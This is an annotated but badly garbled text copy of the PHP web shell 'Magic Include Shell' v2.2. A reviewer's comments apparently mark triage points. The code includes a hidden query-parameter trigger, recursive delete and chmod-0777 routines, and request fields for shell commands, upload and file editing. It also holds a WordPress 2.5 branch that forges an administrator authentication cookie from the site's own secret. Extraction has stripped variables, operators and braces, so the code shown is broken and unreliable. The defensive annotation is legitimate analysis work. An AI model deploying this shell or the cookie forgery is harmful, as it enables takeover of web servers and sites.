Title: <?php
1lt?php
2/Magic Include Shell by Mag icq 884888/
3 /From Russia With Love/
// Version string of the shell; it is echoed into the page <title> further down.
4ver'2.2'
// Activation gate: tests for a query-string parameter named `stulcheg`. The
// braces were lost in extraction, so how much of the script this guards cannot
// be read from the listing (presumably everything that follows). For triage,
// requests carrying that parameter are the ones to look for in access logs.
5if(isset(_GETstulcheg))
// ZIP archive builder. Local file records are collected in datasec and
// central-directory records in ctrl_dir; file() joins them into the finished
// archive. Reading aid: the extraction appears to have dropped `$`, `=`, braces,
// brackets and semicolons, and `lt`/`gt` stand for `<`/`>`.
6 7class zipfile
// Local file header + data records, one per added entry.
8 9 var datasec array()
// Central-directory records, one per added entry.
10 var ctrl_dir array()
// "PK\x05\x06" followed by four zero bytes; file() emits it after the central directory.
11 var eof_ctrl_dir "\x50\x4b\x05\x06\x00\x00\
x00\x00"
// Written into each central-directory record as its 4-byte offset field.
12 var old_offset 0
// Converts a Unix timestamp into a packed DOS date/time integer. A value of 0
// means "use the current time" (getdate() with no argument).
13 function unix2DosTime(unixtime 0)
14 timearray (unixtime 0) ? getdate()
getdate(unixtime)
// Years before 1980 are replaced by 1980-01-01 00:00:00.
15 if (timearray'year' lt 1980)
16 timearray'year' 1980
17 timearray'mon' 1
18 timearray'mday' 1
19 timearray'hours' 0
20 timearray'minutes' 0
21 timearray'seconds' 0
// Each field is shifted into its bit position; seconds are halved (>> 1). The
// operator combining the fields was lost in extraction (presumably bitwise OR).
22 23 return ((timearray'year' - 1980) ltlt
25) (timearray'mon' ltlt 21)
(timearray'mday' ltlt 16)
24 (timearray'hours' ltlt 11)
(timearray'minutes' ltlt 5) (timearray'second
s' gtgt 1)
// Adds a directory entry called `name` (backslashes turned into '/'): a local
// header with zeroed fields followed by a matching central-directory record.
25 26 function addDir(name)
27 28 name str_replace("\\", "/", name)
29 fr "\x50\x4b\x03\x04"
30 fr . "\x0a\x00"
31 fr . "\x00\x00"
32 fr . "\x00\x00"
33 fr . "\x00\x00\x00\x00"
34 fr . pack("V",0)
35 fr . pack("V",0)
36 fr . pack("V",0)
37 fr . pack("v", strlen(name) )
38 fr . pack("v", 0 )
39 fr . name
// NOTE(review): crc, c_len and unc_len are not assigned anywhere in this method
// as shown, so these three fields are packed from unset variables.
40 fr . pack("V",crc)
41 fr . pack("V",c_len)
42 fr . pack("V",unc_len)
43 this -gt datasec fr
44 new_offset strlen(implode("",
this-gtdatasec))
45 cdrec "\x50\x4b\x01\x02"
46 cdrec ."\x00\x00"
47 cdrec ."\x0a\x00"
48 cdrec ."\x00\x00"
49 cdrec ."\x00\x00"
50 cdrec ."\x00\x00\x00\x00"
51 cdrec . pack("V",0)
52 cdrec . pack("V",0)
53 cdrec . pack("V",0)
54 cdrec . pack("v", strlen(name) )
55 cdrec . pack("v", 0 )
56 cdrec . pack("v", 0 )
57 cdrec . pack("v", 0 )
58 cdrec . pack("v", 0 )
// `ext` is assigned twice and not used again in this method.
59 ext "\x00\x00\x10\x00"
60 ext "\xff\xff\xff\xff"
61 cdrec . pack("V", 16 )
62 cdrec . pack("V", this -gt old_offset
)
63 this -gt old_offset new_offset
64 cdrec . name
65 this -gt ctrl_dir cdrec
// Adds one file entry. `data` is the raw content, `name` the path stored in the
// archive, `time` a Unix timestamp handed to unix2DosTime() (0 = now).
66 67 function addFile(data, name, time 0)
68 69 name str_replace('\\', '/',
name)
// Removes the substrings '../' and './' from the stored name. str_replace makes
// a single pass, so this is a filter rather than full path normalisation.
70 name str_replace(array('../','./'),
'', name)
// The DOS time is rendered as hex and rearranged into four '\xNN' escapes in
// reversed byte order; eval() is used only to turn those escapes into raw bytes.
// NOTE(review): the eval() input comes from dechex() of an integer, not from the
// request, so this call is not by itself the code-execution entry point of the
// sample. pack('V', ...) would yield the same bytes without eval().
71 dtime dechex(this-gtunix2DosTime(ti
me))
72 hexdtime '\x' . dtime6 . dtime7
73 . '\x' . dtime4 . dtime5
74 . '\x' . dtime2 . dtime3
75 . '\x' . dtime0 . dtime1
76 eval('hexdtime "' . hexdtime . '"')
77 fr "\x50\x4b\x03\x04"
78 fr . "\x14\x00"
79 fr . "\x00\x00"
80 fr . "\x08\x00"
81 fr . hexdtime
82 unc_len strlen(data)
83 crc crc32(data)
// gzcompress() output minus its first 2 and last 4 bytes is what gets stored.
84 zdata gzcompress(data)
85 zdata substr(substr(zdata, 0,
strlen(zdata) - 4), 2)
86 c_len strlen(zdata)
87 fr . pack('V', crc)
88 fr . pack('V', c_len)
89 fr . pack('V', unc_len)
90 fr . pack('v', strlen(name))
91 fr . pack('v', 0)
92 fr . name
93 fr . zdata
// CRC and both sizes are written a second time after the compressed data.
94 fr . pack('V', crc)
95 fr . pack('V', c_len)
96 fr . pack('V', unc_len)
97 this -gt datasec fr
98 cdrec "\x50\x4b\x01\x02"
99 cdrec . "\x00\x00"
100 cdrec . "\x14\x00"
101 cdrec . "\x00\x00"
102 cdrec . "\x08\x00"
103 cdrec . hexdtime
104 cdrec . pack('V', crc)
105 cdrec . pack('V', c_len)
106 cdrec . pack('V', unc_len)
107 cdrec . pack('v', strlen(name) )
108 cdrec . pack('v', 0 )
109 cdrec . pack('v', 0 )
110 cdrec . pack('v', 0 )
111 cdrec . pack('v', 0 )
112 cdrec . pack('V', 32 )
113 cdrec . pack('V', this -gt old_offset )
114 this -gt old_offset strlen(fr)
115 cdrec . name
116 this -gt ctrl_dir cdrec
// Returns the complete archive as a string: all local records, the central
// directory, the end record signature, the entry count (written twice), the
// central-directory length, the length of the data section and a zero comment length.
117 118 function file()
119 120 data implode('', this -gt datasec)
121 ctrldir implode('', this -gt
ctrl_dir)
122 return
123 data .
124 ctrldir .
125 this -gt eof_ctrl_dir .
126 pack('v', sizeof(this -gt ctrl_dir))
.
127 pack('v', sizeof(this -gt ctrl_dir))
.
128 pack('V', strlen(ctrldir)) .
129 pack('V', strlen(data)) .
130 "\x00\x00"
// Adds every element of `files` that is_file() accepts. The content is read with
// PHP's built-in file() and stored under the path exactly as it was passed in.
131 132 function addFiles(files)
133 134 foreach(files as file)
135 136 if (is_file(file))
137 138 data implode("",file(file))
139 this-gtaddFile(data,file)
// Writes the finished archive to the path `file` (fopen mode "w"). No check of
// the fopen() result is visible in this listing.
140 141 142 143 function output(file)
144 145 fpfopen(file,"w")
146 fwrite(fp,this-gtfile())
147 fclose(fp)
// Minimal ZIP reader. ReadFile() parses an archive from disk into
// SimpleUnzipEntry objects kept in Entries; the Get*() methods read fields of
// one entry by index.
148 149 150 class SimpleUnzip
151 var Comment ''
152 var Entries array()
153 var Name ''
154 var Size 0
155 var Time 0
// Constructor named after the class (pre-PHP 5 style): parses the archive
// straight away when a file name is supplied.
156 function SimpleUnzip(in_FileName '')
157 158 if (in_FileName ! '')
159 SimpleUnzipReadFile(in_FileName
)
// Accessors. Each returns one field of the entry at in_Index; none of them
// checks that the index exists.
160 161 162 function Count()
163 164 return count(this-gtEntries)
165 166 function GetData(in_Index)
167 168 return this-gtEntriesin_Index-gtData
169 170 function GetEntry(in_Index)
171 172 return this-gtEntriesin_Index
173 174 function GetError(in_Index)
175 176 return this-gtEntriesin_Index-gtErro
r
177 178 function GetErrorMsg(in_Index)
179 180 return this-gtEntriesin_Index-gtErro
rMsg
181 182 function GetName(in_Index)
183 184 return this-gtEntriesin_Index-gtName
185 186 function GetPath(in_Index)
187 188 return this-gtEntriesin_Index-gtPath
189 190 function GetTime(in_Index)
191 192 return this-gtEntriesin_Index-gtTime
// Reads the whole archive `in_FileName` into memory and fills Entries.
// Per-entry error codes set below: 1 compressed-size mismatch, 2 decompression
// failed, 3 uncompressed-size mismatch, 4 CRC32 mismatch, 5 entry encrypted,
// 6 unsupported compression method, 7 bzip2 extension unavailable.
// Returns the Entries array. Results of fopen()/fread() are not checked here.
193 194 function ReadFile(in_FileName)
195 196 this-gtEntries array()
197 this-gtName in_FileName
198 this-gtTime filemtime(in_FileName)
199 this-gtSize filesize(in_FileName)
200 oF fopen(in_FileName, 'rb')
201 vZ fread(oF, this-gtSize)
202 fclose(oF)
// The archive comment is taken from the part after the "PK\x05\x06" signature,
// with CR LF and CR normalised to LF.
203 aE explode("\x50\x4b\x05\x06",
vZ)
204 aP unpack('x16/v1CL', aE1)
205 this-gtComment substr(aE1, 18,
aP'CL')
206 this-gtComment strtr(this-gtComment,
array("\r\n" gt "\n","\r" gt "\n"))
// Entries are found by splitting the raw bytes on the "PK\x01\x02" and
// "PK\x03\x04" signatures rather than by following recorded offsets.
207 aE explode("\x50\x4b\x01\x02",
vZ)
208 aE explode("\x50\x4b\x03\x04",
aE0)
209 array_shift(aE)
210 foreach (aE as vZ)
211 aI array()
212 aI'E' 0
213 aI'EM' ''
// Header fields: version, flags (GPF), method (CM), time (FT), date (FD), CRC,
// compressed size (CS), uncompressed size (UCS), file-name length (FNL).
214 aP unpack('v1VN/v1GPF/v1CM/v1FT
/v1FD/V1CRC/V1CS/V1UCS/v1FNL', vZ)
215 bE (aP'GPF' 0x0001) ?
TRUE FALSE
216 nF aP'FNL'
// When flag 0x0008 is tested true, CRC and sizes are re-read from the last 12
// bytes of the record, which are then cut off.
217 if (aP'GPF' 0x0008)
218 aP1 unpack('V1CRC/V1CS/V1UC
S', substr(vZ, -12))
219 aP'CRC' aP1'CRC'
220 aP'CS' aP1'CS'
221 aP'UCS' aP1'UCS'
222 vZ substr(vZ, 0, -12)
// Names ending in '/' (directories) are skipped. The stored name is split into
// 'P' (dirname, with '.' mapped to '') and 'N' (basename).
// NOTE(review): 'P' is taken from the archive as-is; dirname() does not resolve
// or reject '..' components, so consumers of Path must not assume it stays
// inside a chosen directory.
223 224 aI'N' substr(vZ, 26, nF)
225 if (substr(aI'N', -1) '/')
226 continue
227 228 aI'P' dirname(aI'N')
229 aI'P' aI'P' '.' ? ''
aI'P'
230 aI'N' basename(aI'N')
231 vZ substr(vZ, 26 nF)
232 if (strlen(vZ) ! aP'CS')
233 aI'E' 1
234 aI'EM' 'Compressed size is
not equal with the value in header information.'
235 else
236 if (bE)
237 aI'E' 5
238 aI'EM' 'File is
encrypted, which is not supported from this
class.'
239 else
// Method 0 leaves the data untouched, 8 uses gzinflate(), 12 uses bzdecompress().
240 switch(aP'CM')
241 case 0
242 break
243 case 8
244 vZ
gzinflate(vZ)
245 break
// For method 12 the bz2 extension is loaded at run time with dl() if it is not
// already present; `_at_` is apparently the extraction's rendering of the `@`
// error-suppression operator.
246 case 12
247 if (!
extension_loaded('bz2'))
248 if
(strtoupper(substr(PHP_OS, 0, 3)) 'WIN')
249 _at_dl('php_bz2.dll')
250 else
251 _at_dl('bz2.so')
252 253 254 if
(extension_loaded('bz2'))
255 vZ
bzdecompress(vZ)
256 else
257 aI'E' 7
258 aI'EM'
"PHP BZIP2 extension not available."
259 260 break
261 default
262 aI'E' 6
263 aI'EM'
"De-/Compression method aP'CM' is not
supported."
// Integrity checks, run only when no error has been recorded so far:
// decompression result, uncompressed length, then CRC32.
264 265 if (! aI'E')
266 if (vZ FALSE)
267 aI'E' 2
268 aI'EM'
'Decompression of data failed.'
269 else
270 if (strlen(vZ)
! aP'UCS')
271 aI'E' 3
272 aI'EM'
'Uncompressed size is not equal with the value in
header information.'
273 else
274 if
(crc32(vZ) ! aP'CRC')
275 aI'E'
4
276 aI'EM'
'CRC32 checksum is not equal with the value in
header information.'
277 278 279 280 281 282 283 aI'D' vZ
// The entry time is rebuilt with mktime() from the packed FT/FD header fields.
284 aI'T' mktime((aP'FT'
0xf800) gtgt 11,
285 (aP'FT'
0x07e0) gtgt 5,
286 (aP'FT'
0x001f) ltlt 1,
287 (aP'FD'
0x01e0) gtgt 5,
288 (aP'FD'
0x001f),
289 ((aP'FD'
0xfe00) gtgt 9) 1980)
290 this-gtEntries new
SimpleUnzipEntry(aI)
291 292 return this-gtEntries
// Plain holder for one parsed archive entry. The constructor copies the keys
// 'D', 'E', 'EM', 'N', 'P', 'T' of the array it is given into Data, Error,
// ErrorMsg, Name, Path and Time.
293 294 295 class SimpleUnzipEntry
296 var Data ''
297 var Error 0
298 var ErrorMsg ''
299 var Name ''
300 var Path ''
301 var Time 0
302 function SimpleUnzipEntry(in_Entry)
303 304 this-gtData in_Entry'D'
305 this-gtError in_Entry'E'
306 this-gtErrorMsg in_Entry'EM'
307 this-gtName in_Entry'N'
308 this-gtPath in_Entry'P'
309 this-gtTime in_Entry'T'
// Extracts every entry of the archive `filename` below `destination_folder`.
// A trailing '/' is appended to the destination when missing. For each entry
// the path components are created one by one with mkdir(..., 0777) (`_at_` is
// apparently the `@` error-suppression operator), then the entry data is
// written with fopen(..., 'w'). Entry error codes are not consulted.
// NOTE(review): the entry path comes from the archive and is joined to the
// destination without normalisation or a containment check, so extraction is
// not confined to destination_folder, and the directories it creates are
// world-writable. Treat anything this routine has unpacked as untrusted when
// examining an affected host.
310 311 312 function unzipFile(filename, destination_folder
)
313 if (substr(destination_folder, -1) !
'/')
314 destination_folder
destination_folder .'/'
315 316 vzip new SimpleUnzip(filename)
317 foreach (vzip-gtEntries as extr)
318 path extr-gtPath
319 path_folder explode ('/', path)
320 new_path ''
321 foreach (path_folder as
folder)
322 new_path . folder .'/'
323 to_create
destination_folder . new_path
324 if (substr(to_create,
-1) '/')
325 to_create
substr(to_create, 0, strlen(to_create)-1)
326 327 _at_mkdir(to_create, 0777)
328 329 new_path ''
330 filev fopen (destination_folder.
extr-gtPath .'/'. extr-gtName, 'w')
331 fwrite (filev, extr-gtData)
332 fclose (filev)
// Deletes the path `file` and prints "file deleted!" or "file delete error!"
// as HTML. In what appears to be the directory branch it sets the mode to 0777,
// walks the directory with opendir()/readdir() skipping "." and "..", then
// calls rmdir(); the other branch calls unlink(). The statement inside the
// readdir loop did not survive extraction (presumably a recursive dd() call;
// not confirmed by this listing). Callers are outside this listing.
// NOTE(review): chmod(0777) runs before removal is attempted, so a directory
// whose removal failed is left world-writable; that permission change is a
// filesystem artifact worth checking for during triage.
333 334 335 function dd(file)
-
- if (is_dir(file) is_file(file))
336 chmod(file,0777)
337 handle opendir(file)
338 while(filename readdir(handle))
339 if (filename ! "." filename ! "..")
340 closedir(handle)
341 if(_at_rmdir(file))
- print "file deleted!ltbr/gt"
- else
- print "file delete error!ltbr/gt"
342 343 if(_at_unlink(file))
- print "file deleted!ltbr/gt"
- else
- print "file delete error!ltbr/gt"
// Builds and returns a ',,'-separated string of paths found under `file`.
// The first branch sets the mode of `file` to 0777, walks it with
// opendir()/readdir() and, for every name other than "." and "..", appends the
// result of a recursive call on "<file>/<name>"; the other branch appends
// `file` itself. The branch condition was lost in extraction, and `archive` is
// not initialised anywhere in the function as shown.
// NOTE(review): the walk changes permissions on what it visits, so paths
// unexpectedly set to 0777 can indicate which trees were enumerated.
344 345 346 function add2zipfile(file)
347 chmod(file,0777)
348 handle opendir(file)
349 while(filename readdir(handle))
350 if (filename ! "." filename ! "..")
-
- archive.add2zipfile(rtrim(file,'/').'/'.filena
me).',,' - //archive.rtrim(file,'/').'/'.filename.',,'
351 closedir(handle)
352 return archive
353 354 archive.file
355 return archive
// Returns a display label for the running PHP SAPI: fixed strings for
// 'apache2handler', 'apache', 'cgi' and 'cgi-fcgi', otherwise PHP_SAPI itself.
356 357 358 function U_sapi()
359 360 switch(PHP_SAPI)
361 362 case 'apache2handler' return 'Apache
2.0 Handler'
363 case 'apache' return 'Apache'
364 case 'cgi' return 'CGI'
365 case 'cgi-fcgi' return
'CGI/FastCGI'
366 default return PHP_SAPI
// Returns a description of the host operating system: php_uname() when that
// function exists, otherwise 'Windows NT' for PHP_OS 'WINNT', otherwise PHP_OS.
367 368 369 function U_getos()
370 371 if (function_exists('php_uname')) return
php_uname()
372 if (PHP_OS 'WINNT')
373 return 'Windows NT'
374 return PHP_OS
// Stores PHP_SELF in `site`.
375 376sitePHP_SELF
// WordPress-specific branch. The condition tests that WPLANG is defined, that
// the POST field `admin_cookies` is present, and that wp_version matches the
// pattern '2\.5' (the operators joining the three tests were lost in
// extraction). The three functions below carry the names of WordPress's own
// wp_salt(), wp_hash() and wp_generate_auth_cookie().
377if(defined('WPLANG') isset(_POSTadmin_cookies
) ereg('2\.5',wp_version))
// Returns the site's secret material: SECRET_KEY (when defined, non-empty and
// different from wp_default_secret_key) concatenated with SECRET_SALT or, when
// that constant is undefined, the 'secret' option. Side effect: if the option
// is empty a new value is generated and saved with update_option().
378 379function wp_salt()
- global wp_default_secret_key
- secret_key ''
- if ( defined('SECRET_KEY') ('' ! SECRET_KEY)
( wp_default_secret_key ! SECRET_KEY) ) - secret_key SECRET_KEY
- if ( defined('SECRET_SALT') )
- salt SECRET_SALT
- else
- salt get_option('secret')
- if ( empty(salt) )
- salt wp_generate_password()
- update_option('secret', salt)
-
-
- return apply_filters('salt', secret_key . salt)
// HMAC-MD5 of `data` keyed with wp_salt(); falls back to md5(data . salt) when
// hash_hmac() is unavailable.
380 381function wp_hash(data)
- salt wp_salt()
- if ( function_exists('hash_hmac') )
- return hash_hmac('md5', data, salt)
- else
- return md5(data . salt)
// Builds a cookie value for the hard-coded user name 'admin': the name, the
// expiration and an HMAC-MD5 over both, keyed from the site's own secret. The
// separator literals appear empty here, presumably lost in extraction.
// NOTE(review): because the key is the installation's own secret, a value
// produced here would presumably be accepted by that site as an administrator
// session without a password. For response, replace SECRET_KEY/SECRET_SALT and
// the stored 'secret' option so previously issued values stop validating, and
// review administrator accounts and sessions.
382 383function wp_generate_auth_cookie(expiration)
- key wp_hash('admin' . expiration)
- hash hash_hmac('md5', 'admin' . expiration,
key) - cookie 'admin' . '' . expiration . '' .
hash - return cookie
// Request handling starts here. Each name below is copied straight from
// _POST/_GET into a variable; nothing in this section validates the values or
// authenticates the caller. Field names seen: file2zip, deldira, arhiv,
// comanda, shcom, filee, uploadfile, uploaddir, del, edit, save_edit (POST) and
// dira, filee, edit (GET). What each one drives is decided by code outside this
// listing; the names are useful as search terms in request logs.
// This part calls ereg(), which was removed in PHP 7.0, so the script as
// written needs an older interpreter.
384 385 386header("Content-type text/html")
387file2zip_POST'file2zip'
388deldira_POST'deldira'
389arhiv_POST'arhiv'
// dira is read from the query string, falls back to './' when empty or unset,
// and gets a '/' appended when the ereg() test fails (the pattern shown is "/";
// it may have lost a `$` anchor in extraction).
390dira_GET'dira'
391(empty(dira) !isset(dira)) ? dira'./' ''
392if(!ereg("/",dira)) diradira.'/'
393comanda_POST'comanda'
394shcom_POST'shcom'
// filee: the POST value is used as given; the GET value is prefixed with dira.
395if(isset(_POST'filee') !empty(_POST'filee'
))
396filee_POST'filee'
397elseif(isset(_GET'filee')
!empty(_GET'filee'))
398fileedira.''._GET'filee'
399uploadfile_POST'uploadfile'
400uploaddir_POST'uploaddir'
401del_POSTdel
// edit: taken from POST when present and non-empty, otherwise from GET.
402if(isset(_POST'edit') !empty(_POST'edit')
)
403edit_POST'edit'
404elseif(isset(_GET'edit') !empty(_GET'edit'
))
405edit_GET'edit'
406save_edit_POSTsave_edit
// Repeatedly cuts a span out of `str`: the text before the first occurrence of
// `sym` is kept and joined to the text starting at an offset computed from that
// position and `len`; the loop ends when `sym` is no longer found, and the
// resulting string is returned. The arithmetic and comparison operators were
// lost in extraction, so the exact offset and the strictness of the strpos()
// test cannot be confirmed from this listing.
407function cutter(str,sym,len)
408doserr1
409if(strpos(str,sym)!false)
410serr0
411str1 substr(str,0,strpos(str,sym))
412str2 substr(str,strpos(str,sym)len,strlen(
str))
413str str1.str2
414 415 while(serr0)
416return str
// Passes the raw query string through cutter() with the marker 'dira' and a
// length of 999, i.e. the `dira` parameter is cut out of it; the result is kept
// in `kverya`. The pattern and replacement strings in the loop below are empty
// in this listing (presumably lost in extraction), so what it collapses cannot
// be read from here.
417 418kveryacutter(_SERVER"QUERY_STRING",'dira',99
9)
419while(ereg('',kverya))
420 421kveryastr_replace('','',kverya)
422 423?gt
424lthtmlgt
425ltheadgt
426lttitlegtMagic Include Shell lt?php echo ver
?gtlt/titlegt
427ltSTYLE fprolloverstylegt
428ACOLOR 00ff00
429INPUT BORDER-LEFT-COLOR 000000 BACKGROUND
000000 BORDER-BOTTOM-COLOR 000000 FONT 12px
Verdana, Arial, Helvetica, sans-serif COLOR
00ff00 BORDER-TOP-COLOR 000000
BORDER-RIGHT-COLOR 000000